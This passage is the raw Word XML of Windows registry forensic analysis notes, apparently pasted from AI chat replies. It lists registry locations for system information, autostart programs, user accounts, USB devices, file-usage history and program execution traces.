    <w:p w14:paraId="1F13B902" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use forensic tools to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserAssist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shellbags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, Prefetch, and Jump Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> for deeper user activity insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AD3CB2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Harden systems by enabling </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTFS last access timestamps</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> to improve forensic accuracy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE50A1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="2AD15E46">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="696813C4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve">If you'd like, I can provide an automated PowerShell script or a detailed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> playbook covering these registry-related checks and exploitation techniques as well. Just ask!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CB39E4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="0778CB0E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve">Sure! Here's a clean, corrected, and summarized version of your </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Registry Forensic Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve"> notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401288CA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="3D1A6D3C">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="221689C6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Registry Forensic Analysis Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B022FB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Account and System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613ADDE9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Version:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A600E9C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current Control Set:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\Select\Current</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\Select\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>LastKnownGood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="421D3DC7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Computer Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="76D7E397" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Zone Information:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>TimeZoneInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53431210" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Network Interfaces and Past Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18D38B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06784C46" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5012C590" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>User-specific:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B31FEA0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>System-wide:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48022DBF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. SAM Hive (User Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1C857" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>SAM\Domains\Account\Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F5DD0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. USB Device History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320ED4D9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Device volume names:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>PortableDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E084BF7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Device identification history:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Enum\USBSTOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Enum\USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F573958" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>First and last connection/removal timestamps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\&lt;Vendor_Product_Version&gt;\&lt;USBSerial#&gt;\Properties\{83da6326-97a6-4088-9453-a19231573b29}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703FAD1F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:lastRenderedPageBreak/>
        <w:t>0064 = First connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E17B64" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>0066 = Last connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4647925B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>0067 = Last removal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C67D88" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bluetooth Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CAA764" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20849121" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. File and Folder Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C064C0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recent Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5D159" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Office Recent Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Office\&lt;VERSION&gt;\UserMRU\LiveID_&lt;UserID&gt;\FileMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D14A1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ShellBags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (folder view history):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>BagMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\Shell\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>BagMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D4166" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Open/Save and Last Visited Dialogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32C8E3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDLMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49517658" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5535EB8E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Windows Explorer Address/Search Bars</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109A7B68" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D0FF0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D924C9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Program Execution History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664E824" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserAssist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>GUID}\Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AA4F7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ShimCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AppCompatCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\Session Manager\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>AppCompatCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3707632F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
